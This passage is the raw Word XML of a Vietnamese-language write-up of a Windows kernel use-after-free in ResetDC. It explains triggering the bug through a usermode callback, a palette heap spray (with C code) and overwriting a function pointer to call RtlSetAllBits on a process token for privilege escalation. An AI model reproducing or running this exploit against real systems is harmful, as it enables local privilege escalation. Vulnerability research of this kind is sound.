        <w:t xml:space="preserve"> Sử dụng hook này vì 2 lí do: trigger được lỗi use-after-free và kiểm soát được các đối số có thể truyền vào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055F0F31" w14:textId="62321B87" w:rsidR="008308C7" w:rsidRDefault="00C10BAA" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00C10BAA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ResetDC</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10BAA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10BAA">
        <w:t xml:space="preserve">sẽ </w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10BAA">
        <w:t xml:space="preserve">iải phóng </w:t>
      </w:r>
      <w:r>
        <w:t>handle structure</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10BAA">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10BAA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ResetDC</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10BAA">
        <w:t xml:space="preserve"> sẽ không kiểm tra xem </w:t>
      </w:r>
      <w:r>
        <w:t>handle</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10BAA">
        <w:t xml:space="preserve"> có khả dụng hay không và </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">usermode – callback </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10BAA">
        <w:t>sẽ được gọi trong</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10BAA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ResetDC</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10BAA">
        <w:t xml:space="preserve">. Điều này cho phép </w:t>
      </w:r>
      <w:r>
        <w:t>ta có thể</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10BAA">
        <w:t xml:space="preserve"> giải phóng cùng một </w:t>
      </w:r>
      <w:r>
        <w:t>handle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFF8362" w14:textId="6CC0F335" w:rsidR="002969B2" w:rsidRPr="00DB77A8" w:rsidRDefault="008308C7" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Khi </w:t>
      </w:r>
      <w:r w:rsidRPr="008308C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">ResetDC </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">được gọi ở user mode, nó sẽ thực thi syscall </w:t>
      </w:r>
      <w:r w:rsidRPr="008308C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>NtGdiResetDC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> và chức năng bên trong của </w:t>
      </w:r>
      <w:r w:rsidR="00DB77A8" w:rsidRPr="008308C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>GreResetDCInternal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DD1BFE">
        <w:t>Tại</w:t>
      </w:r>
      <w:r w:rsidR="00DD1BFE" w:rsidRPr="00DD1BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DD1BFE" w:rsidRPr="008308C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>GreResetDCInternal</w:t>
      </w:r>
      <w:r w:rsidR="00DD1BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DD1BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00DD1BFE" w:rsidRPr="00DB77A8">
        <w:t>sẽ thực gọi hàm</w:t>
      </w:r>
      <w:r w:rsidR="00DD1BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> hdcOpenDCW()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D86A5DC" w14:textId="7AF0E792" w:rsidR="00DB77A8" w:rsidRPr="00DB77A8" w:rsidRDefault="00DB77A8" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB77A8">
        <w:t>Hàm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>hdcOpenDCW(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sẽ thực hiện callback lại user mode. Lúc này, ta sẽ gọi </w:t>
      </w:r>
      <w:r w:rsidRPr="008308C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ResetDC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB77A8">
        <w:t>lần thứ 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB77A8">
        <w:t>ở bên trong hook sẽ giải phóng được old DC object truyền vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497EE164" w14:textId="13CE7102" w:rsidR="00DB77A8" w:rsidRDefault="00DB77A8" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Sau khi thực hiện xong callback,</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB77A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>hdcOpenDCW(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  quay trở lại </w:t>
      </w:r>
      <w:r w:rsidRPr="008308C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>GreResetDCInternal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB77A8">
        <w:t>ở lần gọi đầu tiên, nhưng con trỏ không gian bộ nhớ vẫn trỏ tới old DC object đã bị giải phóng trước đó</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4521A642" w14:textId="303EFC95" w:rsidR="00260FE7" w:rsidRDefault="00260FE7" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Trigger use-after-free thành công, ta có thể sử dụng nó để gọi tới kernel function tùy ý</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2033F1F4" w14:textId="11EAFF9B" w:rsidR="00D62ABE" w:rsidRDefault="00D62ABE" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67376642" wp14:editId="3E48554A">
            <wp:extent cx="6188710" cy="3829050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1721191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3EC4F" w14:textId="5DB9AB70" w:rsidR="00D62ABE" w:rsidRDefault="00E0497B" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2)   </w:t>
      </w:r>
      <w:r w:rsidR="00D62ABE">
        <w:t>Sử dụng lại không gian bộ nhớ đã cấp phát cho DC object đã được free</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA8E79F" w14:textId="28F7252C" w:rsidR="009C0188" w:rsidRDefault="009C0188" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="426"/>
      </w:pPr>
      <w:r w:rsidRPr="009C0188">
        <w:t xml:space="preserve">Theo Kaspersky đã đề cập, để khai thác ta có thể sử dụng Gdi </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Palette </w:t>
      </w:r>
      <w:r w:rsidRPr="009C0188">
        <w:t xml:space="preserve">và một </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">kernel function call </w:t>
      </w:r>
      <w:r w:rsidRPr="009C0188">
        <w:t>duy nhất để đạt được khả năng đọc/ghi bộ nhớ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="009C0188">
        <w:t xml:space="preserve"> tùy ý</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F00C15" w14:textId="77777777" w:rsidR="009A2F23" w:rsidRDefault="002977C8" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="426"/>
      </w:pPr>
      <w:r w:rsidRPr="002977C8">
        <w:t>Sử dụng Palettes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002977C8">
        <w:t>để chiếm bộ nhớ của DEV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> object</w:t>
      </w:r>
      <w:r w:rsidRPr="002977C8">
        <w:t xml:space="preserve"> trong </w:t>
      </w:r>
      <w:r>
        <w:t>old</w:t>
      </w:r>
      <w:r w:rsidRPr="002977C8">
        <w:t>DC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> object</w:t>
      </w:r>
      <w:r w:rsidRPr="002977C8">
        <w:t xml:space="preserve"> đã giải phóng và </w:t>
      </w:r>
      <w:r w:rsidR="0093739C">
        <w:t>thay đổi</w:t>
      </w:r>
      <w:r w:rsidRPr="002977C8">
        <w:t xml:space="preserve"> con trỏ hàm </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002977C8">
        <w:t>UMPDDrvResetPDEV</w:t>
      </w:r>
      <w:r w:rsidR="0093739C">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0093739C">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="002977C8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0093739C">
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="002977C8">
        <w:t xml:space="preserve"> lệnh</w:t>
      </w:r>
      <w:r w:rsidR="0093739C">
        <w:t xml:space="preserve"> kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="002977C8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0093739C">
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="002977C8">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D84C92" w14:textId="04281D10" w:rsidR="002977C8" w:rsidRDefault="009A2F23" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="426"/>
      </w:pPr>
      <w:r>
        <w:t>Sử dụng</w:t>
      </w:r>
      <w:r w:rsidR="002977C8" w:rsidRPr="002977C8">
        <w:t xml:space="preserve"> hàm RtlSet AllBits nhằm sửa đổi các quyền của </w:t>
      </w:r>
      <w:r>
        <w:t>process token</w:t>
      </w:r>
      <w:r w:rsidR="002977C8" w:rsidRPr="002977C8">
        <w:t xml:space="preserve"> để đạt được leo thang đặc quyền. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B3A0FB" w14:textId="18291A59" w:rsidR="00F72B0C" w:rsidRDefault="00F72B0C" w:rsidP="00A67CF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186B16A" wp14:editId="5741864F">
            <wp:extent cx="6188710" cy="3395345"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5117965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FA25D" w14:textId="1C26C2EA" w:rsidR="00082971" w:rsidRPr="00D62ABE" w:rsidRDefault="00082971" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Palettes Spray</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A01624" w14:textId="01F6F51C" w:rsidR="009C0188" w:rsidRDefault="001F694B" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Dựa vào “</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="001F694B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>windows rs3 exploitation primitive</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>” thì kích thước của palettes có thể được kiểm soát nên có thể được dùng cho heap spraying</w:t>
      </w:r>
      <w:r w:rsidR="007132FC">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65139E48" w14:textId="4508F017" w:rsidR="007132FC" w:rsidRDefault="007132FC" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tạo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Palettes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBB6ACF" w14:textId="77777777" w:rsidR="007132FC" w:rsidRPr="007132FC" w:rsidRDefault="007132FC" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto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132FC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2CCCFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>VOID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7132FC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SprayPalettes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132FC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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>DWORD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132FC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size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2CFD4551" w14:textId="77777777" w:rsidR="007132FC" w:rsidRPr="007132FC" w:rsidRDefault="007132FC" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto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0B58FE29" w14:textId="77777777" w:rsidR="007132FC" w:rsidRPr="007132FC" w:rsidRDefault="007132FC" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto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132FC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    /* Spray palettes to reclaim freed memory */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701B142D" w14:textId="77777777" w:rsidR="007132FC" w:rsidRPr="007132FC" w:rsidRDefault="007132FC" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto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9E205C5" w14:textId="77777777" w:rsidR="007132FC" w:rsidRPr="007132FC" w:rsidRDefault="007132FC" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto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DWORD palCount </w:t>
      </w:r>
      <w:r w:rsidRPr="007132F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  <w:r w:rsidRPr="007132FC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size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132F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-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132F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0x</w:t>
      </w:r>
      <w:r w:rsidRPr="007132FC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90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7132F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/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132FC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4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4F04477C" w14:textId="77777777" w:rsidR="007132FC" w:rsidRPr="007132FC" w:rsidRDefault="007132FC" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto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DWORD palSize </w:t>
      </w:r>
      <w:r w:rsidRPr="007132F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7132F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sizeof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LOGPALETTE) </w:t>
      </w:r>
      <w:r w:rsidRPr="007132F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+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(palCount </w:t>
      </w:r>
      <w:r w:rsidRPr="007132F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-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132FC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7132F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*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132F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sizeof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(PALETTEENTRY);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72372F9E" w14:textId="77777777" w:rsidR="007132FC" w:rsidRPr="007132FC" w:rsidRDefault="007132FC" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto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LOGPALETTE</w:t>
      </w:r>
      <w:r w:rsidRPr="007132F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*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lPalette </w:t>
      </w:r>
      <w:r w:rsidRPr="007132F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(LOGPALETTE</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007132F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*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  <w:r w:rsidRPr="007132FC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malloc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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(palSize);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2ABCDB" w14:textId="77777777" w:rsidR="007132FC" w:rsidRPr="007132FC" w:rsidRDefault="007132FC" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto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649BEC28" w14:textId="77777777" w:rsidR="007132FC" w:rsidRPr="007132FC" w:rsidRDefault="007132FC" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto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7132F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if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(lPalette </w:t>
      </w:r>
      <w:r w:rsidRPr="007132F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==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132FC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NULL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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBFA920" w14:textId="77777777" w:rsidR="007132FC" w:rsidRPr="007132FC" w:rsidRDefault="007132FC" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto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132FC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puts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132FC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"[-] Failed to create palette"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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC80E5C" w14:textId="77777777" w:rsidR="007132FC" w:rsidRPr="007132FC" w:rsidRDefault="007132FC" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto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r w:rsidRPr="007132F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return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68DBC22D" w14:textId="77777777" w:rsidR="007132FC" w:rsidRPr="007132FC" w:rsidRDefault="007132FC" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FF8ECC" w14:textId="39C252AA" w:rsidR="007132FC" w:rsidRPr="007132FC" w:rsidRDefault="007132FC" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:line="360" w:lineRule="auto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   </w:t>
      </w:r>
      <w:r w:rsidRPr="007132FC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lPalette</w:t>
      </w:r>
      <w:r w:rsidRPr="007132F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-&gt;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palNumEntries </w:t>
      </w:r>
      <w:r w:rsidRPr="007132F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(WORD)palCount;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B521C5" w14:textId="574748B7" w:rsidR="007132FC" w:rsidRPr="007132FC" w:rsidRDefault="007132FC" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto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7132FC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lPalette</w:t>
      </w:r>
      <w:r w:rsidRPr="007132F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-&gt;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palVersion </w:t>
      </w:r>
      <w:r w:rsidRPr="007132F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132F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0x</w:t>
      </w:r>
      <w:r w:rsidRPr="007132FC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300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2CDD7236" w14:textId="77777777" w:rsidR="007132FC" w:rsidRPr="007132FC" w:rsidRDefault="007132FC" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto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7132FC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CreatePalette</w:t>
      </w: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(lPalette);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46734DD2" w14:textId="77777777" w:rsidR="007132FC" w:rsidRPr="007132FC" w:rsidRDefault="007132FC" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="141523"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto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132F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6AD54145" w14:textId="55BA8FDE" w:rsidR="0054687B" w:rsidRDefault="0054687B" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D113574" w14:textId="1A9AEB43" w:rsidR="0054687B" w:rsidRDefault="0054687B" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tính toán kích thước có thể sử dụng từ DEV object. </w:t>
      </w:r>
      <w:r w:rsidR="00DA1345">
        <w:t xml:space="preserve">Ở </w:t>
      </w:r>
      <w:r w:rsidR="00DA1345" w:rsidRPr="00DA1345">
        <w:t>Windows 10 build 1</w:t>
      </w:r>
      <w:r w:rsidR="00DA1345">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00DA1345" w:rsidRPr="00DA1345">
        <w:t xml:space="preserve">09, </w:t>
      </w:r>
      <w:r w:rsidR="00DA1345">
        <w:t>thì</w:t>
      </w:r>
      <w:r w:rsidR="00DA1345" w:rsidRPr="00DA1345">
        <w:t xml:space="preserve"> size </w:t>
      </w:r>
      <w:r w:rsidR="00DA1345">
        <w:t>của</w:t>
      </w:r>
      <w:r w:rsidR="00DA1345" w:rsidRPr="00DA1345">
        <w:t> PDEVOBJ is 0xe30</w:t>
      </w:r>
      <w:r w:rsidR="00DA1345">
        <w:t xml:space="preserve"> nên ta có thể sử dụng tối đa size truyền vào là 0xe30 (</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="00DA1345" w:rsidRPr="005D3F0E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/ZoloZiak/WinNT4/blob/master/private/ntos/w32/ntgdi/gre/pdevobj.hxx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DA1345">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD90481" w14:textId="274A1C4D" w:rsidR="005D3F0E" w:rsidRDefault="009C0EC6" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Theo POC được viết trên </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1345">
        <w:t xml:space="preserve">Windows 10 build </w:t>
      </w:r>
      <w:r w:rsidRPr="009C0EC6">
        <w:t>1607</w:t>
      </w:r>
      <w:r w:rsidR="009D63FB">
        <w:t>, ghi đè địa chỉ</w:t>
      </w:r>
      <w:r w:rsidR="003407A4">
        <w:t xml:space="preserve"> và con trỏ</w:t>
      </w:r>
      <w:r w:rsidR="009D63FB">
        <w:t xml:space="preserve"> hàm </w:t>
      </w:r>
      <w:r w:rsidR="003407A4" w:rsidRPr="003407A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>RtlSetAllBits</w:t>
      </w:r>
      <w:r w:rsidR="003407A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003407A4" w:rsidRPr="003407A4">
        <w:t>như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0123A374" w14:textId="5A0FED1F" w:rsidR="003407A4" w:rsidRDefault="003407A4" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003407A4">
        <w:t>p[0x</w:t>
      </w:r>
      <w:r w:rsidR="00735483">
        <w:t>D7</w:t>
      </w:r>
      <w:r w:rsidRPr="003407A4">
        <w:t xml:space="preserve">] = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003407A4">
        <w:t>globals::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003407A4">
        <w:t>fakeRtlBitMapAddr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BB9626" w14:textId="2CA69468" w:rsidR="003407A4" w:rsidRDefault="003407A4" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003407A4">
        <w:t>p[0x1</w:t>
      </w:r>
      <w:r w:rsidR="00735483">
        <w:t>4D</w:t>
      </w:r>
      <w:r w:rsidRPr="003407A4">
        <w:t xml:space="preserve">] = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003407A4">
        <w:t>globals::</w:t>
      </w:r>
